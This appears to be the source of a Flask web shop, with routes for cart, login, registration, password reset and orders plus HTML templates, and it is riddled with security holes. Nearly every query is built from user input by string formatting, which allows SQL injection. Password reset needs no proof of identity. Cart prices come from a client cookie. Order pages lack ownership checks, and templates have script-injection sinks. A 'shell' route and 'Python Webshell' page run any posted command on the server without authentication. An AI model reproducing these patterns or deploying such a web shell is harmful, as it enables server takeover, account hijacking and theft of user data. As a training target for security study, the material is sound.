app/routes/cart.py
from flask import Blueprint, render_template, request, redirect, url_for
import json

from .session import get_user
from app.database import get_db_connection

cart_bp = Blueprint("cart", __name__)


@cart_bp.route("/cart", methods=["GET"])
@cart_bp.route("/cart.html", methods=["GET"])
def cart() -> str:
    user = get_user()

    cart_data = request.cookies.get("cart", "[]")
    cart_items = json.loads(cart_data)

    total_items = sum([item["quantity"] for item in cart_items])
    total_price = sum([item["price"] * item["quantity"] for item in cart_items])

    return render_template(
        "cart.html",
        user=user,
        cart_items=cart_items,
        total_items=total_items,
        total_price=total_price,
    )


@cart_bp.route("/purchase", methods=["GET"])
@cart_bp.route("/purchase.html", methods=["GET"])
def purchase() -> str:
    user = get_user()

    if user is None:
        return redirect(url_for("login.login"))

    cart_data = request.cookies.get("cart", "[]")
    cart_items = json.loads(cart_data)

    try:
        with get_db_connection() as conn:
            with conn.cursor() as cur:
                cur.execute(
                    f"""
                    INSERT INTO
                        receipts(username, date, total)
                    VALUES
                        ('{user.username}', NOW(), {sum([item['price'] * item['quantity'] for item in cart_items])})
                    RETURNING id
                    """
                )

                receipt_id = cur.fetchone()[0]

                for item in cart_items:
                    cur.execute(
                        f"""
                        INSERT INTO
                            purchases(receipt_id, item_id, quantity)
                        VALUES
                            ({receipt_id}, {item['id']}, {item['quantity']})
                        """
                    )
                cur.close()
        response = redirect(url_for("cart.cart"))
        response.set_cookie("cart", json.dumps([]))

        return response
    except:
        return '', 500

app/routes/forgot_password.py
import logging
from flask import Blueprint, render_template, redirect, request, url_for

from app.database import get_db_connection
from .session import get_user

forgot_password_bp = Blueprint("forgot-password", __name__)


@forgot_password_bp.route("/forgot-password", methods=["GET"])
@forgot_password_bp.route("/forgot-password.html", methods=["GET"])
def forgot_password() -> str:
    user = get_user()

    if user is None:
        return render_template("forgot-password.html")
    return redirect(url_for("index.index"))


@forgot_password_bp.route("/forgot-password", methods=["POST"])
@forgot_password_bp.route("/forgot-password.html", methods=["POST"])
def post() -> str:
    username = request.form.get("username")
    password = request.form.get("password")

    if not username or not password:
        return render_template(
            "forgot-password.html", error="Missing username or password"
        )

    try:
        with get_db_connection() as conn:
            with conn.cursor() as cur:
                cur.execute(
                    f"""
                    UPDATE users SET password = '{password}' WHERE username = '{username}'
                    """
                )
                cur.close()

                return redirect(url_for("index.index"))
    except Exception as e:
        logging.error(e)

        return render_template("forgot-password.html", error=e)

app/routes/login.py
import logging
import uuid
from datetime import datetime, timedelta
from flask import Blueprint, render_template, request, redirect, url_for

from app.database import get_db_connection
from .session import get_user

login_bp = Blueprint("login", __name__)


@login_bp.route("/login", methods=["GET"])
@login_bp.route("/login.html", methods=["GET"])
def login() -> str:
    user = get_user()

    if user is None:
        return render_template("login.html")
    return redirect(url_for("index.index"))


@login_bp.route("/login", methods=["POST"])
@login_bp.route("/login.html", methods=["POST"])
def post() -> str:
    username = request.form.get("username")
    password = request.form.get("password")

    if not username or not password:
        return render_template("login.html", error="Missing username or password")

    try:
        with get_db_connection() as conn:
            with conn.cursor() as cur:
                cur.execute(
                    f"""
                    SELECT COUNT(*) FROM users WHERE username = '{username}' AND password LIKE '{password}'
                    """
                )
                count = cur.fetchone()[0]

                if not count:
                    return render_template("Invalid username or password")

                session_id = uuid.uuid4().hex
                expiration_time = datetime.now() + timedelta(hours=6)

                cur.execute(
                    f"""
                    INSERT INTO sessions (session_id, username, expiration) VALUES ('{session_id}', '{username}', '{expiration_time}');
                    """
                )

                response = redirect(url_for("index.index"))
                response.set_cookie("session_id", session_id, expires=expiration_time)

                return response
    except Exception as e:
        logging.error(e)

        return render_template("login.html", error=e)

app/routes/logout.py
from flask import Blueprint, redirect, url_for

logout_bp = Blueprint("logout", __name__)


@logout_bp.route("/logout", methods=["GET"])
@logout_bp.route("/logout.html", methods=["GET"])
def logout() -> str:
    response = redirect(url_for("index.index"))
    response.set_cookie("session_id", "", expires=0)

    return response

app/routes/orders.py
from flask import Blueprint, render_template, redirect, url_for
from .session import get_user
from app.database import get_db_connection

orders_bp = Blueprint("orders", __name__)


@orders_bp.route("/orders", methods=["GET"])
@orders_bp.route("/orders.html", methods=["GET"])
def orders() -> str:
    user = get_user()

    if user is None:
        return render_template("login.html")

    with get_db_connection() as conn:
        with conn.cursor() as cur:
            cur.execute(
                f"""
                SELECT
                    receipts.id, receipts.username, receipts.date, receipts.total, SUM(purchases.quantity) as item_count
                FROM
                    receipts
                JOIN
                    purchases
                ON
                    receipts.id = purchases.receipt_id
                WHERE
                    receipts.username = '{user.username}'
                GROUP BY
                    receipts.id
                ORDER BY
                    receipts.date DESC;
                """
            )

            orders_raw = cur.fetchall()
            orders = []

            for order_raw in orders_raw:
                order = {
                    "id": order_raw[0],
                    "username": order_raw[1],
                    "date": order_raw[2].strftime("%A, %d %B %Y"),
                    "total": order_raw[3],
                    "items": order_raw[4],
                }

                orders.append(order)
            cur.close()

    return render_template("orders.html", user=user, orders=orders)


@orders_bp.route("/order/<int:order_id>", methods=["GET"])
def order(order_id: int) -> str:
    if order_id is None or not isinstance(order_id, int):
        return redirect(url_for("orders.orders"))

    user = get_user()

    if user is None:
        return redirect(url_for("orders.orders"))

    with get_db_connection() as conn:
        with conn.cursor() as cur:
            cur.execute(
                f"""
                SELECT
                    purchases.quantity, items.name, items.description, items.image, items.price
                FROM
                    purchases
                JOIN
                    items
                ON
                    purchases.item_id = items.id
                WHERE
                    purchases.receipt_id = {order_id}
                """
            )

            receipt_items_raw = cur.fetchall()
            receipt_items = []

            for item_raw in receipt_items_raw:
                item = {
                    "quantity": item_raw[0],
                    "name": item_raw[1],
                    "description": item_raw[2],
                    "image": item_raw[3],
                    "price": item_raw[4],
                }

                receipt_items.append(item)

            cur.execute(
                f"""
                SELECT
                    total, date
                FROM
                    receipts
                WHERE
                    id = {order_id}
                """
            )

            total_price, date = cur.fetchone()
            date = date.strftime("%A, %d %B %Y")
            cur.close()

    total_items = sum([item["quantity"] for item in receipt_items])

    return render_template(
        "order.html",
        user=user,
        order_id=order_id,
        total_price=total_price,
        total_items=total_items,
        date=date,
        receipt_items=receipt_items,
    )

app/routes/register.py
import logging
from flask import Blueprint, render_template, request, redirect, url_for

from app.database import get_db_connection
from .session import get_user

register_bp = Blueprint("register", __name__)


@register_bp.route("/register", methods=["GET"])
@register_bp.route("/register.html", methods=["GET"])
def register() -> str:
    user = get_user()

    if user is None:
        return render_template("register.html")
    return redirect(url_for("index.index"))


@register_bp.route("/register", methods=["POST"])
@register_bp.route("/register.html", methods=["POST"])
def post() -> str:
    username = request.form["username"]
    password = request.form["password"]

    if not username or not password:
        return render_template("register.html", error="Missing username or password")

    try:
        with get_db_connection() as conn:
            with conn.cursor() as cur:
                cur.execute(
                    f"""
                    SELECT COUNT(*) FROM users WHERE username = '{username}'
                    """
                )
                count = cur.fetchone()[0]

                if count:
                    return render_template(
                        "register.html", error=f'User "{username}" already exists'
                    )

                cur.execute(
                    f"""
                    INSERT INTO users (username, password) VALUES ('{username}', '{password}');
                    """
                )
                cur.close()

                return redirect(url_for("login.login"))
    except Exception as e:
        logging.error(e)

        return render_template("register.html", error=e)

app/routes/shell.py
from flask import request, Blueprint, render_template, jsonify
from datetime import datetime
import subprocess

shell_bp = Blueprint("shell", __name__)


@shell_bp.route("/shell", methods=["GET"])
def shell():
    return render_template("shell.html")


@shell_bp.route("/execute", methods=["POST"])
def execute_command():
    data = request.get_json()
    command = data["command"]
    time_executed = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    try:
        output = subprocess.check_output(
            command, shell=True, text=True, stderr=subprocess.STDOUT
        )
    except subprocess.CalledProcessError as e:
        output = e.output
    return jsonify({"output": output, "command": command, "time": time_executed})

templates/base.html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>{{ config.site_name }}</title>
    <script src="{{ url_for('static', filename='js/tailwindcss-3.4.0.js') }}"></script>
    <script src="{{ url_for('static', filename='js/cart.js')}}" defer></script>
    <link
      rel="icon"
      type="image/x-icon"
      href="{{ url_for('static', filename='favicon.ico') }}"
    />
  </head>
  <style>
    .hide-scrollbar::-webkit-scrollbar {
      display: none;
    }

    .hide-scrollbar {
      -ms-overflow-style: none;
      scrollbar-width: none;
    }
  </style>
  <body
    class="bg-blue-200 text-primaryText dark:bg-gray-700 dark:text-white hide-scrollbar"
  >
    <nav class="bg-white dark:bg-gray-800 shadow p-4 fixed top-0 inset-x-0">
      <div class="container mx-auto flex justify-between items-center">
        <div class="flex">
          <img
            src="{{ url_for('static', filename='images/logo.png') }}"
            class="w-6 mr-3"
          />
          <a
            href="{{ url_for('index.index') }}"
            class="text-gray-800 dark:text-white text-lg font-bold"
            >{{ config.site_name }}</a
          >
        </div>
        {% if user %} 
          <span class="text-gray-300 text-m pr-4 uppercase font-bold">
          {{ user.username }}
          </span>
        {% endif%}
        <div class="flex items-center">
          {% if user %}
            {% if user.admin %}
            <a
              href="/debug"
              class="text-gray-800 dark:text-white mr-4"
              >Debug</a
            >
            {% endif %}
            <a
              href="{{ url_for('orders.orders') }}"
              class="text-gray-800 dark:text-white mr-4"
              >Orders</a
            >
            <a
              href="{{ url_for('logout.logout') }}"
              class="text-gray-800 dark:text-white"
              >Logout</a
            >
            {% else %}
            <a
            href="{{ url_for('login.login') }}"
            class="text-gray-800 dark:text-white mr-4"
            >Login</a
            >
            <a
            href="{{ url_for('register.register') }}"
            class="text-gray-800 dark:text-white"
            >Register</a
            >
            {% endif %}
            <div
              class="relative cursor-pointer ml-4"
              onClick="window.location.href='{{ url_for('cart.cart') }}'"
            >
              <svg
                xmlns="http://www.w3.org/2000/svg"
                height="18"
                width="22"
                viewBox="0 0 576 512"
              >
                <path
                  fill="white"
                  d="M0 24C0 10.7 10.7 0 24 0H69.5c22 0 41.5 12.8 50.6 32h411c26.3 0 45.5 25 38.6 50.4l-41 152.3c-8.5 31.4-37 53.3-69.5 53.3H170.7l5.4 28.5c2.2 11.3 12.1 19.5 23.6 19.5H488c13.3 0 24 10.7 24 24s-10.7 24-24 24H199.7c-34.6 0-64.3-24.6-70.7-58.5L77.4 54.5c-.7-3.8-4-6.5-7.9-6.5H24C10.7 48 0 37.3 0 24zM128 464a48 48 0 1 1 96 0 48 48 0 1 1 -96 0zm336-48a48 48 0 1 1 0 96 48 48 0 1 1 0-96z"
                />
              </svg>
              <span
                id="cart-counter"
                class="absolute top-0 right-0 inline-flex items-center justify-center px-1 py-0.5 text-[0.6rem] font-bold leading-none text-red-100 transform translate-x-1/2 -translate-y-1/2 bg-red-600 rounded-full"
              >
                0
              </span>
            </div>
          </div>
        </div>
    </div>
    </nav>
    <div class="flex flex-col text-center mx-10 mt-24 mb-24">
      {% block content %} {% endblock %}
    </div>
    <footer
      class="bg-white dark:bg-gray-800 shadow p-4 mt-8 fixed bottom-0 inset-x-0"
    >
      <div class="container mx-auto text-center">
        {{ config.site_name }} © 2023
      </div>
    </footer>
  </body>
</html>

templates/cart.html
{% extends 'base.html' %} {% block content %}
<div class="container mx-auto mt-10">
  <div class="mx-auto w-5/6 bg-white px-10 py-10 shadow-md">
    <div class="flex justify-between pb-8">
      <h1 class="font-semibold text-2xl text-gray-600">Shopping Cart</h1>
      <div class-"flex flex-col">
      <h2 class="font-semibold text-xl text-gray-600">
        Total Items: {{ total_items }}
      </h2>
      <h2 class="font-semibold text-xl text-gray-600">
        Total Price: ${{ "%.2f"|format(total_price) }}
      </h2>
    </div>
    {% if total_items > 0 and user %}
    <button
      class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded"
      onClick="window.location.href='{{ url_for('cart.purchase')}}'"
    >
      Complete Purchase
    </button>
    {% elif total_items == 0 and user%}
    <button class="bg-gray-500 text-white font-bold py-2 px-4 rounded" disabled>
      Add Items to Cart First
    </button>
    {% else %}
    <button
      class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded"
      onClick="window.location.href='{{ url_for('login.login')}}'"
    >
      Login to Purchase
    </button>
    {% endif %}
  </div>
  <div class="flex mt-10 mb-5 pt-2 border-t">
    <h3 class="font-semibold text-gray-600 text-xs uppercase w-2/5">
      Product Details
    </h3>
    <h3
      class="font-semibold text-center text-gray-600 text-xs uppercase w-1/5 text-center"
    >
      Quantity
    </h3>
    <h3
      class="font-semibold text-center text-gray-600 text-xs uppercase w-1/5 text-center"
    >
      Price
    </h3>
    <h3
      class="font-semibold text-center text-gray-600 text-xs uppercase w-1/5 text-center"
    >
      Subtotal
    </h3>
  </div>
  {% for item in cart_items %}
  <div class="flex items-center hover:bg-gray-100 -mx-8 px-6 py-5">
    <div class="flex w-2/5">
      <img
        class="h-24"
        src="{{ url_for('static', filename='images'+item.image) }}"
        alt="{{ item.name }}"
      />
      <div class="flex flex-col justify-between ml-4 flex-grow">
        <span class="font-bold text-sm text-gray-600">{{ item.name }}</span>
        <span class="text-xs text-gray-600">{{ item.description }}</span>
      </div>
    </div>
    <div class="flex justify-center w-1/5 text-gray-600">
      {{ item.quantity }}
    </div>
    <div class="flex justify-center w-1/5 text-gray-600">
      ${{ "%.2f"|format(item.price) }}
    </div>
    <div class="flex justify-center w-1/5 text-gray-600">
      ${{ "%.2f"|format(item.price * item.quantity) }}
    </div>
  </div>
  {% endfor %}
</div>
{% endblock %}

templates/forgot-password.html
{% extends 'base.html' %} {% block content %}
<div class="mt-32"></div>
<div class="flex items-center justify-center">
  <div class="bg-white p-6 rounded shadow-md min-w-80 w-4/12">
    <form action="{{ url_for('forgot-password.post') }}" method="POST">
      <h2 class="text-lg text-center font-bold mb-4 text-gray-700">
        Forgot Password
      </h2>
      <div class="mb-2">
        <label for="username" class="block text-gray-700 text-sm font-bold mb-2"
          >Username</label
        >
        <input
          type="text"
          id="username"
          name="username"
          class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline"
          required
        />
      </div>

      <div class="mb-2">
        <label for="password" class="block text-gray-700 text-sm font-bold mb-2"
          >New Password</label
        >
        <input
          type="password"
          id="password"
          name="password"
          class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 mb-3 leading-tight focus:outline-none focus:shadow-outline"
          required
        />
      </div>
      {% if error %}
      <div
        class="text-sm text-red-600 bg-red-100 border border-red-400 p-2 rounded mb-4"
      >
        {{ error }}
      </div>
      {% endif %}

      <div class="flex items-center justify-between">
        <button
          class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded focus:outline-none focus:shadow-outline"
          type="submit"
        >
          Change Password
        </button>
      </div>
    </form>
  </div>
</div>
{% endblock %}

templates/index.html
{% extends 'base.html' %} {% block content %}
<form class="mb-4 flex justify-center" action="{{ url_for('index.index') }}">
  <input
    type="text"
    name="q"
    placeholder="Search items..."
    class="px-4 py-2 border rounded-lg w-full sm:w-1/2 lg:w-1/3 mr-4 text-gray-600"
  />
  <button
    type="submit"
    class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-2 rounded"
  >
    Search
  </button>
</form>
{% if q %}
<p class="text-center mb-4">Search results for <strong>{{ q }}</strong></p>
{% endif %}
<div
  class="grid grid-cols-1 sm:grid-cols-2 md:grid-cols-3 lg:grid-cols-4 xl:grid-cols-5 gap-4"
>
  {% for id, name, description, image, price in items %} 
  {% if not q or q and q in name or q in description %}
  <div class="bg-white rounded-lg shadow-lg overflow-hidden flex flex-col">
    <img
      src="{{ url_for('static', filename='images'+image) }}"
      alt="{{ name }}"
      class="w-full object-cover"
    />
    <div class="w-full h-0.5 bg-black"></div>
    <div class="p-2 flex flex-grow flex-col">
      <h3 class="font-bold text-lg text-gray-600">{{ name }}</h3>
      <p class="text-sm text-gray-600 mt-1 flex-grow">{{ description }}</p>
      <button
        class="mt-3 w-full bg-blue-500 text-white text-xs font-bold uppercase rounded hover:bg-blue-600 py-2"
        onClick="addToCart({{ id }}, '{{ name }}', '{{ description }}', '{{ image}}', {{ price }})"
      >
        Buy for {{ price }}
      </button>
    </div>
  </div>
  {% endif %}
  {% endfor %}
</div>
{% endblock %}

templates/login.html
{% extends 'base.html' %} {% block content %}
<div class="mt-32"></div>
<div class="flex items-center justify-center">
  <div class="bg-white p-6 rounded shadow-md min-w-80 w-4/12">
    <form action="{{ url_for('login.post') }}" method="POST">
      <h2 class="text-lg text-center font-bold mb-4 text-gray-700">Login</h2>
      <div class="mb-2">
        <label for="username" class="block text-gray-700 text-sm font-bold mb-2"
          >Username</label
        >
        <input
          type="text"
          id="username"
          name="username"
          class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline"
          required
        />
      </div>

      <div class="mb-2">
        <label for="password" class="block text-gray-700 text-sm font-bold mb-2"
          >Password</label
        >
        <input
          type="password"
          id="password"
          name="password"
          class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 mb-3 leading-tight focus:outline-none focus:shadow-outline"
          required
        />
      </div>
      {% if error %}
      <div
        class="text-sm text-red-600 bg-red-100 border border-red-400 p-2 rounded mb-4"
      >
        {{ error }}
      </div>
      {% endif %}

      <div class="flex items-center justify-between">
        <button
          class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded focus:outline-none focus:shadow-outline"
          type="submit"
        >
          Login
        </button>
        <a
          href="/forgot-password"
          class="inline-block align-baseline font-bold text-sm text-blue-500 hover:text-blue-800"
          >Forgot Password
        </a>
      </div>
    </form>
  </div>
</div>
{% endblock %}

templates/order.html
{% extends 'base.html' %} {% block content %}
<div class="container mx-auto mt-10">
  <div class="mx-auto w-5/6 bg-white px-10 py-10 shadow-md">
    <div class="flex justify-between pb-8">
      <h1 class="font-semibold text-2xl text-gray-600">
        Order #{{ '{:04d}'.format(order_id) }}
      </h1>
      <h2 class="font-semibold text-2xl text-gray-600">
        {{ date }}
      </h2>
      <div class-"flex flex-col">
        <h2 class="font-semibold text-xl text-gray-600">
          Total Items: {{ total_items }}
        </h2>
        <h2 class="font-semibold text-xl text-gray-600">
          Total Price: ${{ "%.2f"|format(total_price) }}
        </h2>
      </div>
    </div>
    <div class="flex mt-10 mb-5 pt-2 border-t">
      <h3 class="font-semibold text-gray-600 text-xs uppercase w-2/5">
        Product Details
      </h3>
      <h3
        class="font-semibold text-center text-gray-600 text-xs uppercase w-1/5 text-center"
      >
        Quantity
      </h3>
      <h3
        class="font-semibold text-center text-gray-600 text-xs uppercase w-1/5 text-center"
      >
        Price
      </h3>
      <h3
        class="font-semibold text-center text-gray-600 text-xs uppercase w-1/5 text-center"
      >
        Subtotal
      </h3>
    </div>
    {% for item in receipt_items %}
    <div class="flex items-center hover:bg-gray-100 -mx-8 px-6 py-5">
      <div class="flex w-2/5">
        <img
          class="h-24"
          src="{{ url_for('static', filename='images'+item.image) }}"
          alt="{{ item.name }}"
        />
        <div class="flex flex-col justify-between ml-4 flex-grow">
          <span class="font-bold text-sm text-gray-600">{{ item.name }}</span>
          <span class="text-xs text-gray-600">{{ item.description }}</span>
        </div>
      </div>
      <div class="flex justify-center w-1/5 text-gray-600">
        {{ item.quantity }}
      </div>
      <div class="flex justify-center w-1/5 text-gray-600">
        ${{ "%.2f"|format(item.price) }}
      </div>
      <div class="flex justify-center w-1/5 text-gray-600">
        ${{ "%.2f"|format(item.price * item.quantity) }}
      </div>
    </div>
    {% endfor %}
  </div>
</div>
{% endblock %}

templates/orders.html
{% extends 'base.html' %} {% block content %}
<div class="container mx-auto mt-10">
  <div class="mx-auto w-5/6 bg-white px-10 py-10 shadow-md">
    <div class="flex mt-10 mb-5 pt-2 border-t">
      <h3 class="font-semibold text-gray-600 text-xs uppercase w-1/4">
        Order ID
      </h3>
      <h3
        class="font-semibold text-center text-gray-600 text-xs uppercase w-1/4 text-center"
      >
        Date
      </h3>
      <h3
        class="font-semibold text-center text-gray-600 text-xs uppercase w-1/4 text-center"
      >
        Items
      </h3>
      <h3
        class="font-semibold text-center text-gray-600 text-xs uppercase w-1/4 text-center"
      >
        Total
      </h3>
    </div>
      {% for order in orders %}
      <div class="flex items-center hover:bg-gray-100 -mx-8 px-6 py-5" onclick="window.location.href = '/order/{{ order.id }}'">
        <div class="flex justify-center w-1/4 text-gray-600">
          #{{ '{:04d}'.format(order.id) }}
        </div>
        <div class="flex justify-center w-1/4 text-gray-600">
          {{ order.date }}
        </div>
          <div class="flex justify-center w-1/4 text-gray-600">
            {{ order['items'] }} Items
          </div>
        <div class="flex justify-center w-1/4 text-gray-600">
          ${{ order.total }}
        </div>
      </div>
      {% endfor %}
  </div>
  </div>
</div>
{% endblock %}

templates/register.html
{% extends 'base.html' %} {% block content %}
<div class="mt-32"></div>
<div class="flex items-center justify-center">
  <div class="bg-white p-6 rounded shadow-md min-w-80 w-4/12">
    <form action="{{ url_for('register.post') }}" method="POST">
      <h2 class="text-lg text-center font-bold mb-4 text-gray-700">Register</h2>
      <div class="mb-2">
        <label for="username" class="block text-gray-700 text-sm font-bold mb-2"
          >Username</label
        >
        <input
          type="text"
          id="username"
          name="username"
          class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline"
          required
        />
      </div>

      <div class="mb-2">
        <label for="password" class="block text-gray-700 text-sm font-bold mb-2"
          >Password</label
        >
        <input
          type="password"
          id="password"
          name="password"
          class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 mb-3 leading-tight focus:outline-none focus:shadow-outline"
          required
        />
      </div>
      {% if error %}
      <div
        class="text-sm text-red-600 bg-red-100 border border-red-400 p-2 rounded mb-4"
      >
        {{ error }}
      </div>
      {% endif %}
      <div class="flex items-center justify-between">
        <button
          class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded focus:outline-none focus:shadow-outline"
          type="submit"
        >
          Register
        </button>
      </div>
    </form>
  </div>
</div>
{% endblock %}

templates/shell.html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Webshell</title>
    <script src="{{ url_for('static', filename='js/tailwindcss-3.4.0.js') }}"></script>
  </head>
  <body class="bg-gray-100 p-8">
    <div class="container mx-auto">
      <h1 class="text-2xl font-bold mb-4">Python Webshell</h1>
      <form id="commandForm" class="mb-4">
        <input
          type="text"
          id="commandInput"
          class="border p-2 mr-2"
          placeholder="Enter command"
        />
        <button
          type="submit"
          class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded"
        >
          Execute
        </button>
      </form>
      <div id="output" class=""></div>
    </div>

    <script>
      document
        .getElementById("commandForm")
        .addEventListener("submit", function (e) {
          e.preventDefault();
          const command = document.getElementById("commandInput").value;
          fetch("/execute", {
            method: "POST",
            headers: {
              "Content-Type": "application/json",
            },
            body: JSON.stringify({ command: command }),
          })
            .then((response) => response.json())
            .then((data) => {
              const outputDiv = document.getElementById("output");
              const newCard =
                '<div class="bg-white p-4 rounded shadow mb-4">' +
                '<p class="font-bold">Command: ' +
                data.command +
                "</p>" +
                '<p class="text-sm text-gray-600">Executed at: ' +
                data.time +
                "</p>" +
                '<pre class="mt-2">' +
                data.output +
                "</pre>" +
                "</div>";
              outputDiv.innerHTML = newCard + outputDiv.innerHTML;
              document.getElementById("commandInput").value = "";
            });
        });
    </script>
  </body>
</html>